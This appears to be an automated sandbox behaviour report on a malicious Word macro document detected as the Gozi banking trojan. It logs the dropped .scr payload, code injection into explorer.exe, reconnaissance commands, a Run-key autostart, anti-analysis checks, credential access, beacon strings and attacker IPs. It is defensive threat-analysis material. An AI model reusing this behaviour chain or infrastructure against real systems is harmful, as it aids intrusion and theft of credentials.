Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe 'C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8D4B04E1-1331-11d0-81B8-00C04FD85AB4}\InprocServer32
Uses systeminfo.exe to query system information
Source: unknown | Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Uses tasklist.exe to query information about running processes
Source: unknown | Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Executable creates window controls seldom found in malware
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Window found: window name: SysTabControl32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Data Obfuscation:

Document contains an embedded VBA with many randomly named variables
Source: e41ZuYVo64.docm | Stream path 'VBA/J04Xt': High entropy of concatenated variable names
Source: e41ZuYVo64.docm | Stream path 'VBA/JtuJu': High entropy of concatenated variable names
Source: e41ZuYVo64.docm | Stream path 'VBA/LKfy2': High entropy of concatenated variable names
Source: e41ZuYVo64.docm | Stream path 'VBA/ThisDocument': High entropy of concatenated variable names
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00390600 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 16_2_00390600
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01414F47 push ecx; ret 3_2_01414F57
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_003881D1 push ecx; mov dword ptr [esp], 00000002h 16_2_003881D2
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00395C3B push ecx; ret 16_2_00395C4B
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037EF45 push 8B003994h; ret 16_2_0037EF50
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00634F47 push ecx; ret 16_2_00634F57

Persistence and Installation Behavior:

Drops PE files with a suspicious file extension
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\text.doc.16147.scr
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\text.doc.16147.scr
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\text.doc.16147.scr

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\text.doc.16147.scr
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\text.doc.16147.scr | Window found: window name: ProgMan
Creates an autostart registry key
Source: C:\Windows\explorer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Auxixpps (recorded twice)

Hooking and other Techniques for Hiding and Protection:

Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe | IAT of a user mode module has changed: module: kernel32.dll function: CreateProcessW address: 75329000
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: kernel32.dll function: CreateProcessW new code: 0xE9 0x9C 0xC7 0x74 0x48 0x8A
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe | Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\D4A4208A-23CA-2629-4D48-07BAD1FC2B8E
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (89 identical entries for this process)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (24 identical entries for this process)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (12 identical entries for this process)

Malware Analysis System Evasion:

Evasive VBA macro found (CPU number check)
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open, API Environ("NUMBER_OF_PROCESSORS") Name: Document_Open
Found stalling execution ending in API Sleep call
Source: C:\Users\user\text.doc.16147.scr | Stalling execution: Execution stalls by calling Sleep graph_3-2763
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Stalling execution: Execution stalls by calling Sleep
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_ComputerSystem
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapter
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Users\user\text.doc.16147.scr | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_3-2279
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | API coverage: 6.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\text.doc.16147.scr TID: 1660 | Thread sleep count: 68 > 30
Source: C:\Users\user\text.doc.16147.scr TID: 2728 | Thread sleep count: 67 > 30
Source: C:\Windows\explorer.exe TID: 1916 | Thread sleep time: -10560000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1916 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\systeminfo.exe TID: 624 | Thread sleep time: -780000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe TID: 3836 | Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe TID: 3252 | Thread sleep count: 67 > 30
Source: C:\Windows\System32\tasklist.exe TID: 2636 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\tasklist.exe TID: 2636 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\driverquery.exe TID: 2116 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\driverquery.exe TID: 2116 | Thread sleep time: -60000s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01413ECF CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,HeapFree,HeapFree, 3_2_01413ECF
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00387121 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 16_2_00387121
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_003874A1 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 16_2_003874A1
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00391663 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 16_2_00391663
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe, 00000005.00000000.1115390919.03B66000.00000004.sdmp | Binary or memory string: vmbusres.dllPO
Program exit points
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | API call chain: ExitProcess graph end node (recorded twice)
Queries a list of all running processes
Source: C:\Users\user\text.doc.16147.scr | Process information queried: ProcessInformation

Anti Debugging:

Checks for debuggers (devices)
Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\FileMaps\users_user_appdata_roaming_microsoft_aecaider_3fc0094e727c3194.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\systeminfo.exe | System information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_00390600 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey | 16_2_00390600
Enables debug privileges
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037DCD8 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler | 16_2_0037DCD8
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038AB35 RtlExitUserThread,RtlAddVectoredExceptionHandler,OpenEventA,FreeLibrary,HeapFree | 16_2_0038AB35

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 37.152.176.90 80
Source: C:\Windows\explorer.exe | Network Connect: 178.169.196.83 80
Source: C:\Windows\explorer.exe | Network Connect: 46.139.176.151 80
Allocates memory in foreign processes
Source: C:\Users\user\text.doc.16147.scr | Memory allocated: C:\Windows\explorer.exe base: 1D70000 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory allocated: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 1E0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Users\user\text.doc.16147.scr | Memory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute and read and write
Source: C:\Users\user\text.doc.16147.scr | Memory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute read
Source: C:\Users\user\text.doc.16147.scr | Memory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute and read and write
Source: C:\Users\user\text.doc.16147.scr | Memory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute read
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\text.doc.16147.scr | Thread created: C:\Windows\explorer.exe EIP: 76FDF515
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\text.doc.16147.scr | Memory written: PID: 3000 base: 76FDF515 value: EB
Source: C:\Users\user\text.doc.16147.scr | Memory written: PID: 3000 base: 1D70000 value: 15
Source: C:\Users\user\text.doc.16147.scr | Memory written: PID: 3000 base: 76FDF515 value: 8B
Maps a DLL or memory area into another process
Source: C:\Users\user\text.doc.16147.scr | Section loaded: unknown target pid: 3000 protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\text.doc.16147.scr | Thread register set: target process: 3000
Source: C:\Windows\explorer.exe | Thread register set: target process: 3824
Writes to foreign memory regions
Source: C:\Users\user\text.doc.16147.scr | Memory written: C:\Windows\explorer.exe base: 76FDF515
Source: C:\Users\user\text.doc.16147.scr | Memory written: C:\Windows\explorer.exe base: 1D70000
Source: C:\Users\user\text.doc.16147.scr | Memory written: C:\Windows\explorer.exe base: 76FDF515
Source: C:\Windows\explorer.exe | Memory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 496CB5
Source: C:\Windows\explorer.exe | Memory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 1E0000
Source: C:\Windows\explorer.exe | Memory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 496CB5
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\driverquery.exe driverquery.exe
May try to detect the Windows Explorer process (often used for injection)
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmp | Binary or memory string: Shell_TrayWnd
Source: text.doc.16147.scr, 00000003.00000002.1149445314.01417000.00000004.sdmp | Binary or memory string: ProgMan
Source: text.doc.16147.scr, 00000003.00000002.1149445314.01417000.00000004.sdmp | Binary or memory string: 64RtlSetUnhandledExceptionFilterSystemRoot%08X-%04X-%04X-%04X-%08X%04X{%08X-%04X-%04X-%04X-%08X%04X}ADVAPI32.DLL*.*LdrGetProcedureAddressRtlExitUserThreadCreateRemoteThreadZwWriteVirtualMemoryLdrLoadDllZwProtectVirtualMemorykernelbaseLdrRegisterDllNotificationLdrUnregisterDllNotification\.exe%TEMP%\LowCreateProcessACreateProcessWCreateProcessAsUserACreateProcessAsUserW"%S" "%S"version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%srunascmd.exeLow\DllRegisterServer/C "copy "%s" "%s" /y && rundll32 "%s",%S"/C "copy "%s" "%s" /y && "%s" "%s""ProgManMicrosoft
Source: explorer.exe, 00000005.00000000.1099934971.000ED000.00000004.sdmp | Binary or memory string: Progmanp

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0038F3B0 cpuid | 16_2_0038F3B0
Contains functionality to create pipes for IPC
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe | Code function: 16_2_0037C19E CreateNamedPipeA,CreateThread,GetLastError,CloseHandle,GetLastError | 16_2_0037C19E
Contains functionality to query local / system time
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_01414A4D GetCurrentThreadId,GetSystemTimeAsFileTime,GetTempFileNameA,PathFindExtensionA,lstrcpy | 3_2_01414A4D
Contains functionality to query windows version
Source: C:\Users\user\text.doc.16147.scr | Code function: 3_2_014129A4 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError | 3_2_014129A4
Queries the cryptographic machine GUID
Source: C:\Windows\System32\systeminfo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings
Source: C:\Windows\explorer.exe | File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js

Stealing of Sensitive Information:

Searches for Windows Mail specific files
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail account<.oeaccount
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail account{*}.oeaccount
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Behavior Graph

[Behavior graph rendered as an image in the original report; node labels only. Behavior Graph ID: 820806, Sample: e41ZuYVo64.docm, Startdate: 20/03/2019, Architecture: WINDOWS, Score: 100]
[Process chain from the graph: WINWORD.EXE -> text.doc.16147.scr (dropped PE32) -> explorer.exe (injected) -> cmd.exe, avicbrkr.exe, systeminfo.exe, nslookup.exe, driverquery.exe, tasklist.exe, net.exe. Top-level signatures shown: Snort IDS alert for network traffic, Document exploit detected (drops PE files), Office document tries to convince victim to disable security protection, Injects code into the Windows Explorer (explorer.exe), System process connects to network, Tries to steal Mail credentials (via file access), Overwrites Mozilla Firefox settings, Detected Gozi e-Banking trojan, Found stalling execution ending in API Sleep call, Uses nslookup.exe to query domains, Performs a network lookup / discovery via net view, Queries sensitive network adapter / Operating System / BIOS information via WMI, Writes or reads registry keys via WMI. Network nodes: 31.148.219.163 (Czech Republic), 46.139.176.151 (Hungary), interruption.ru 178.169.196.83 (Romania), 127.0.0.1, 8.8.8.8.in-addr.arpa, 1.0.0.127.in-addr.arpa, 222.222.67.208.in-addr.arpa, resolver1.opendns.com, myip.opendns.com.]

Simulations

Behavior and APIs

Time | Type | Description
16:37:57 | API Interceptor | 2207x Sleep call for process: WINWORD.EXE modified
16:38:54 | API Interceptor | 1x Sleep call for process: text.doc.16147.scr modified
16:38:57 | API Interceptor | 179x Sleep call for process: explorer.exe modified
16:39:18 | API Interceptor | 2x Sleep call for process: nslookup.exe modified
16:39:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Auxixpps C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe
16:39:21 | API Interceptor | 14x Sleep call for process: systeminfo.exe modified
16:39:28 | API Interceptor | 1x Sleep call for process: avicbrkr.exe modified
16:39:30 | API Interceptor | 1x Sleep call for process: net.exe modified
16:39:41 | API Interceptor | 4x Sleep call for process: tasklist.exe modified
16:39:43 | API Interceptor | 4x Sleep call for process: driverquery.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Startup

  • System is w7_1
  • WINWORD.EXE (PID: 3384 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)
    • text.doc.16147.scr (PID: 3300 cmdline: C:\Users\user\text.doc.16147.scr MD5: 2481F6BE75307B79607D12114D2B6102)
      • explorer.exe (PID: 3000 cmdline: C:\Windows\Explorer.EXE MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • cmd.exe (PID: 472 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • nslookup.exe (PID: 3096 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: 5E3830EE3282A53920E00784FEC44CFD)
        • cmd.exe (PID: 2076 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 3676 cmdline: cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • systeminfo.exe (PID: 3620 cmdline: systeminfo.exe MD5: 258B2ED54FC7F74E2FDCCE5861549C1A)
        • avicbrkr.exe (PID: 3824 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe' MD5: 2481F6BE75307B79607D12114D2B6102)
        • cmd.exe (PID: 3640 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2260 cmdline: cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • net.exe (PID: 2316 cmdline: net view MD5: B9A4DAC2192FD78CDA097BFA79F6E7B2)
        • cmd.exe (PID: 2368 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2248 cmdline: cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • nslookup.exe (PID: 2384 cmdline: nslookup 127.0.0.1 MD5: 5E3830EE3282A53920E00784FEC44CFD)
        • cmd.exe (PID: 2332 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 3964 cmdline: cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • tasklist.exe (PID: 2468 cmdline: tasklist.exe /SVC MD5: A9A00E71E3DD67B029FC904FE3BB61DA)
        • cmd.exe (PID: 2364 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2340 cmdline: cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • driverquery.exe (PID: 2324 cmdline: driverquery.exe MD5: 5D1CFD8CF86F05BB27926C9A6893B635)
  • cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\152E.bin1
Process:C:\Windows\System32\driverquery.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):14
Entropy (8bit):3.521640636343319
Encrypted:false
MD5:D1B80F6FA9623357B26CB05DAC9AC2F1
SHA1:4FC491B8236B47D574AE1452BC631C307D2D599D
SHA-256:682E6E920242963B0038CC53EE12972B57972649A323505A4AEF1A2028518040
SHA-512:D39557F4E5C26A80FF2B99D1DACCCF11ABCE11E0E56506E5DB6EF2141D19ED5B727719D45C3D79B92AF3D659D681CB9E74525138880EF5F8E9DC791621E5B6F3
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\22E8.bi1
Process:C:\Windows\System32\cmd.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):11
Entropy (8bit):1.2776134368191157
Encrypted:false
MD5:5B3345909519932D6670D92F16496463
SHA1:6CCABAAC9315486C106AB1BBB7E6F153F5C1A3BD
SHA-256:0B5C0F6FFAC14107357E2C1BFE0DEA06932FD2AA5C8BD598A73F25655F0ABFD5
SHA-512:B41A0E9BA8A092E134E9403EA3C1B080B8F2D1030CE14AFA2647B282F66A76C48A4419D5D0F7C3C78412A427F4B84B8B48349B76FF2C3FD1DA9EC80D2AB14A6B
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\3E76.bin
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):295
Entropy (8bit):5.476401449559547
Encrypted:false
MD5:99BF5BE99FB6241C480F01F00ABF03DF
SHA1:41C6B396383218C274601846E6EC4E614FECEA7F
SHA-256:08FD14CCB4DB396A7906297C79ADE4AF1C2789751B6450C8890ED3BA0514E031
SHA-512:276E5A56881B3130228B65542C5828803A6DECED056AF5818159639A2B0323BFF33F94F26D7CEEADA4738807037ACE0524DE56E667F5F4F05AB5A21B9A02E796
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\46AA.bin
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):22
Entropy (8bit):1.0476747992754052
Encrypted:false
MD5:76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\VBE\MSForms.exd
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):162688
Entropy (8bit):4.381015373024907
Encrypted:false
MD5:A81620BAE6D87B84CF3AAF64C0DA900E
SHA1:9007EC316AB228DDEF55FC10A9F181E9CAA61AF5
SHA-256:366ED4A308AF41334A0143E3E70417DDDD5633FA13307E50FF4DE1A1FB4636D6
SHA-512:C7A2239F1444FBD1576F35C7BF5659D463A47EECAE84655E6EF75C4ECA86DEED710A733BF59FEAB080617447AB029A928DA4BE150674E3DE93FA8637CCE0D3F3
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UUY831YK\logo2[1].png
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:PNG image, 1024 x 718, 8-bit/color RGBA, non-interlaced
Size (bytes):783688
